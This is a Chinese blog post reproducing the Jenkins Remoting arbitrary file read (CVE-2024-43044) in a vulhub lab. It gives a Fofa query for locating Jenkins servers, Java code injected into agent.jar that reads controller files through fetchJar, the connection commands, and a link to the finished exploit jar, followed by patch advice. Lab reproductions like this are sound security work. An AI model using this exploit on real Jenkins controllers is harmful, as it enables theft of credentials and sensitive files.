Jenkins-Remoting 任意文件读取漏洞(CVE-2024-43044)

已于 2024-09-10 14:03:22 修改
阅读量962 收藏 4
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全 jenkins
于 2024-09-10 11:50:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142094345
版权

0x01 漏洞描述:

Jenkins是一个开源的、提供持续集成服务(CI)的软件平台。Jenkins 使用 Remoting 库(通常为agent.jar或remoting.jar)实现控制器与代理之间的通信,该库允许代理从控制器加载类和类加载器资源,以便从控制器发送的 Java 对象(构建步骤等)可以在代理上执行。

Jenkins Remoting任意文件读取漏洞(CVE-2024-43044),由于Remoting库ClassLoaderProxy#fetchJar方法没有限制代理请求从控制器文件系统读取的路径,可能导致拥有Agent/Connect权限的攻击者从Jenkins控制器文件系统读取任意文件(如凭证、配置文件等敏感信息)并进一步利用导致远程代码执行。

0x02 影响版本:

Jenkins <= 2.470

Jenkins LTS <= 2.452.3

受影响组件:

Jenkins Remoting 版本<= 3256.v88a_f6e922152(3206.3208.v409508a_675ff 和3248.3250.v3277a_8e88c9b_ 除外)

0x03 搜索语句:

Fofa:app="Jenkins"

cb44937716564f2e9035051ebbda9aca.png

0x04 环境搭建:

这里使用vulhub靶场进行漏洞复现

d6f107a6397543e6b29442312a8ffc0f.png

环境启动

docker-compose -up -d

67ca5cabda4f4d0bb27ec5afd416fbf3.png

启动后访问http://127.0.0.1:8080进行访问 使用admin/vulhub登录到管理后台

aaa34c5d356c4868a366a0e7eff2e918.png

因为漏洞在Remoting库中出现 因此我们需要对环境进行下配置

导航Dashboard -> Manage Jenkins ->Nodes 处新建一个Agent节点

dd783742a97a422784750f317d13dfb3.png

节点数据填写为默认值就行

05c3a839d2364db3adb950cd3cfa11d1.png

导航Dashboard -> Manage Jenkins -> Plugins 安装插件 Websocket Notifier

 安装完成之后在节点机器node1连接到Jenkins 主服务器(这里需要用到node1节点的secret值,可在新建节点node1里查看)

f1143153eccc44bf9c97a9823b46ef70.png

连接成功后在Jenkins主服务器上可以看到已连接的标识,成功连接之后就可以在Agent节点上部署任务了

ffa93769d7e64746bafcd17700551790.png

到此环境已经搭建完成 

0x05 漏洞复现:

当获取到node1机器的权限后,可以得到连接到Jenkins主服务器的secret和name,这时需要将连接使用的agent.jar替换成恶意的Agent连接Jar包

使用下列语句将agent.jar下载到本地

curl -sO http://127.0.0.1:8080/jnlpJars/agent.jar

反编译后进入

\hudson\remoting\RemoteClassLoader.class

在 RemoteClassLoader.class中加入下列代码


try {  
    Scanner scanner = new Scanner(System.in);  
    System.out.print("输入读取文件path:");  
    String inputText = scanner.nextLine();  
    System.out.println("尝试读取:" + inputText);  
    URL jarFileUrl = new URL("file:///" + inputText);  
    byte[] fileContent = this.proxy.fetchJar(jarFileUrl);  
    String contentAsString = new String(fileContent, StandardCharsets.UTF_8);  
    System.out.println("文件内容:\n" + contentAsString);  
} catch (Exception var10) {  
    System.out.println("WRONG:" + var10);  
}

 4e489116f3d844ab8dfb2e14dea4b608.png

完成后重新打包为agent.jar 使用node1节点的密钥和名称进行访问

访问格式:
java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>
示例:
java -jar agent.jar -url http://127.0.0.1:8080/ -secret 903755f06738aaf209ddecc09ae60f8037a240123aba0ac52bbe1a2780571619 -name node1 -workDir ""

33ce8961e696487cb1e8e14c0cebf8a0.png

 完整jar包下载地址:

https://download.csdn.net/download/xc_214/89733433

0x06 修复建议:

目前这些漏洞已经修复,受影响用户可升级到Jenkins 2.471、LTS 2.452.4、LTS 2.462.1或更高版本。

下载链接:

https://www.jenkins.io/download/

iSee857
关注
专栏目录
Jenkins CLI 任意文件读取漏洞复现(CVE-2024-23897)
0xSec
01-26 2628
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。 2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全
漏洞复现】Jenkins CLI 接口任意文件读取漏洞CVE-2024-23897)
网络安全从业者的学习笔记
07-26 670
Jenkins是一款基于JAVA开发的开源自动化服务器。 Jenkins使用`args4j`来解析命令行输入,并支持通过HTTP、WebSocket等协议远程传入命令行参数。在`args4j`中,用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件
CVE-2024-43044Jenkins Remoting远程代码执行漏洞- 检测漏洞POC(附代码)
Lucker_YYY的博客
08-14 758
Jenkins Remoting远程代码执行漏洞CVE-2024-43044)- 检测漏洞POC(附代码)
CVE-2024-23897 Jenkins 任意文件读取漏洞
LJQClqjc的博客
01-26 3208
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 ( expandAtFiles)。根据Jenkins 官方描述,具有Overall/Read权限的攻击者可以读取整个文件,未授权的攻击者仅能读取文件前几行内容。攻击者可以通过读取jenkins文件获取相关密钥从而实现命令执行。
Jenkins 任意文件读取漏洞分析
qcloud_security的博客
07-26 2355
一、漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange (博客链接:http://blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞。 腾讯安全云鼎实验室安全研究人员对该漏洞进行分析发现,利用这个漏洞,攻击者可以读取 Windows 服...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 1069
任务环境说明:服务器场景:Server1。
jenkins任意文件读取漏洞复现与分析 -CVE-2018-1999002
weixin_33894640的博客
08-09 340
jenkins任意文件读取漏洞复现与分析 -CVE-2018-1999002 0x00 漏洞影响版本 Jenkins weekly up to and including 2.132Jenkins LTS up to and including 2.121.1 0x01 漏洞原理分析 在没有登陆(未授权,cookie清空)的情况下,只有当管理员开启了allow anonymous read acc...
linux任意文件读取漏洞利用,Jenkins 任意文件读取漏洞(CVE-2018-1999002)复现与分析...
weixin_42148053的博客
05-16 1554
Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 O range (博客链接:)挖出的 Jenkins 未授权任意文件读取漏洞。利用这个漏洞,攻击者可以读取 Windows 服务器上的任意文件, 对于 Linux,在特定条件下也可以进行文件读取。利用文件读取漏洞,攻击者可以获取到 Jenkins 的凭证信息,从而造成敏感信息泄露。另外,在很多时候,Je...
Jenkins-Remoting agent.jar
最新发布
09-10
Jenkins Remoting任意文件读取漏洞(CVE-2024-43044),由于Remoting库ClassLoaderProxy#fetchJar方法没有限制代理请求从控制器文件系统读取的路径,可能导致拥有Agent/Connect权限的攻击者从Jenkins控制器文件系统...
Jenkins文件读取漏洞拾遗(CVE-2024-23897)
离别歌
01-29 987
Jenkins 未授权文件读取漏洞CVE-2024-23897)上周闹得沸沸扬扬,我也来简单分析一下这个漏洞,并看看这个文件读取如何利用。首先说的是,由于Jenkins存在版本和插件差异,所以利用时可能也有不一样之处,本文内容不一定适用于所有Jenkins server。我们这里使用Vulhub的环境(2.441)来做分析和演示:https://github.com/vulhub/vulhub/...
【已复现】Jenkins 任意文件读取漏洞CVE-2024-23897)附POC下载
Elliot1314的博客
01-28 3687
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全。内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件
漏洞复现】Jenkins CLI 任意文件读取漏洞CVE-2024-23897)
qq_38073067的博客
01-30 1916
漏洞复现】Jenkins CLI 任意文件读取漏洞CVE-2024-23897)
Jenkins CLI 任意文件读取漏洞复现
qq_32947907的博客
01-30 1550
Jenkins CLI 是 Jenkins 内置的命令行页面。Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,未授权的攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等在 Jenkins 控制器中执行任意代码。
漏洞复现】Jenkins文件读取漏洞CVE-2024-23897)
2301_80127209的博客
06-18 2199
jenkins是啥?简单理解就是:一个开源的、用于方便代码管理、部署的基于web的平台,用于提高团队开发效率(生产力)。Jenkins CLI 任意文件读取漏洞 CVE-2024-23897 是怎么回事?
Jenkins 任意文件读取漏洞
慢慢来的博客
07-26 725
Jenkins通过stapler处理请求,所以从web.xml开始,从doDynamic 方法到serveLocalizedFile 方法到request.getLocale() ,Jetty 在获取 Locale 的时候直接从 HTTP Headers 里取出 Accept-Language 头,用 - 分割后返回了一个 Locale 对象。也就是我传入Accept-Language: ../....
Jenkins任意文件读取漏洞(CVE-2018-1999002)
公众号shadow sock7
07-28 3149
在 Windows 下,不存在的目录可以通过 ../ 遍历过去的,而对于 Linux 则不行。那么这个漏洞在 Windows 下是可以任意文件读取的,而在 Linux 下则需要在 Jenkins plugins 目录下存在一个名字中存在 _ 的目录才可以。 感觉比较鸡肋,谁会没事在Jenkins plugins 目录下建一个_的目录? 参考 https://xz.aliyun.com...
【网络安全Jenkins任意文件读取漏洞及检测工具(CVE-2024-23897)
等风来
09-06 471
Jenkins CLI 接口存在任意文件读取漏洞CVE-2024-23897)。该问题源于 args4j 库在解析文件名参数时,会将@符号后的字符串视为文件名并尝试读取文件,而且该功能默认处于启用状态。
漏洞通告】 Jenkins CLI 任意文件读取漏洞
y995zq的博客
01-30 2098
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。
CVE-2024-23897 JenKins任意文件读取漏洞复现
m0_70489261的博客
02-27 2179
Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值